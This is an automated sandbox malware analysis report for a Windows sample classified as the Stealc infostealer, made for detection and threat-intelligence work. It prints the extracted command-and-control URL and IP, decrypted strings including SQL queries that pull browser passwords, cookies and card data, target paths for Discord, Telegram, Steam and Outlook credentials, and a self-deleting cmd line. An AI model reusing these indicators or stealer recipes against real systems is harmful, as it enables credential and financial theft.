Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1546478
MD5:	43deae52c429449144c488c4ea074c14
SHA1:	2496e112cf08e1584a15d65409d84936f3c8b7f9
SHA256:	bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 0.2.file.exe.680000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.680000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 30
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 11
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 20
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 24
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.680000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Sleep
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.680000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.680000.0.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.680000.0.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.680000.0.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.680000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sscanf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.680000.0.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.680000.0.unpack	String decryptor: http://185.215.113.206
Source: 0.2.file.exe.680000.0.unpack	String decryptor: bksvnsj
Source: 0.2.file.exe.680000.0.unpack	String decryptor: /6c4adf523b719729.php
Source: 0.2.file.exe.680000.0.unpack	String decryptor: /746f34465cf17784/
Source: 0.2.file.exe.680000.0.unpack	String decryptor: tale
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.680000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.680000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Process32First
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.680000.0.unpack	String decryptor: FindClose
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.680000.0.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.680000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.680000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.680000.0.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.680000.0.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.680000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetDC
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.680000.0.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.680000.0.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetOpenA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.680000.0.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PATH
Source: 0.2.file.exe.680000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.680000.0.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.680000.0.unpack	String decryptor: browser:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: profile:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: url:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: login:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: password:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Opera
Source: 0.2.file.exe.680000.0.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Network
Source: 0.2.file.exe.680000.0.unpack	String decryptor: cookies
Source: 0.2.file.exe.680000.0.unpack	String decryptor: .txt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.680000.0.unpack	String decryptor: TRUE
Source: 0.2.file.exe.680000.0.unpack	String decryptor: FALSE
Source: 0.2.file.exe.680000.0.unpack	String decryptor: autofill
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.680000.0.unpack	String decryptor: history
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.680000.0.unpack	String decryptor: cc
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.680000.0.unpack	String decryptor: name:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: month:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: year:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: card:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Cookies
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Login Data
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Web Data
Source: 0.2.file.exe.680000.0.unpack	String decryptor: History
Source: 0.2.file.exe.680000.0.unpack	String decryptor: logins.json
Source: 0.2.file.exe.680000.0.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.680000.0.unpack	String decryptor: usernameField
Source: 0.2.file.exe.680000.0.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.680000.0.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.680000.0.unpack	String decryptor: guid
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.680000.0.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.680000.0.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.680000.0.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.680000.0.unpack	String decryptor: plugins
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.680000.0.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.680000.0.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.680000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Local State
Source: 0.2.file.exe.680000.0.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.680000.0.unpack	String decryptor: chrome
Source: 0.2.file.exe.680000.0.unpack	String decryptor: opera
Source: 0.2.file.exe.680000.0.unpack	String decryptor: firefox
Source: 0.2.file.exe.680000.0.unpack	String decryptor: wallets
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ProductName
Source: 0.2.file.exe.680000.0.unpack	String decryptor: x32
Source: 0.2.file.exe.680000.0.unpack	String decryptor: x64
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ProcessorNameString
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.680000.0.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - OS:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Language:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: All Users:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Current User:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Process List:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: .exe
Source: 0.2.file.exe.680000.0.unpack	String decryptor: runas
Source: 0.2.file.exe.680000.0.unpack	String decryptor: open
Source: 0.2.file.exe.680000.0.unpack	String decryptor: /c start
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.680000.0.unpack	String decryptor: files
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \discord\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: key_datas
Source: 0.2.file.exe.680000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: map*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Telegram
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Tox
Source: 0.2.file.exe.680000.0.unpack	String decryptor: *.tox
Source: 0.2.file.exe.680000.0.unpack	String decryptor: *.ini
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Password
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 00000001
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 00000002
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 00000003
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 00000004
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.680000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.680000.0.unpack	String decryptor: token:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \config\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: browsers
Source: 0.2.file.exe.680000.0.unpack	String decryptor: done
Source: 0.2.file.exe.680000.0.unpack	String decryptor: soft
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.680000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.680000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.680000.0.unpack	String decryptor: https
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.680000.0.unpack	String decryptor: POST
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.680000.0.unpack	String decryptor: hwid
Source: 0.2.file.exe.680000.0.unpack	String decryptor: build
Source: 0.2.file.exe.680000.0.unpack	String decryptor: token
Source: 0.2.file.exe.680000.0.unpack	String decryptor: file_name
Source: 0.2.file.exe.680000.0.unpack	String decryptor: file
Source: 0.2.file.exe.680000.0.unpack	String decryptor: message
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.680000.0.unpack	String decryptor: screenshot.jpg

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00699030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00699030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_0068A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006872A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_006872A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068A2B0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_0068A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0068C920

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

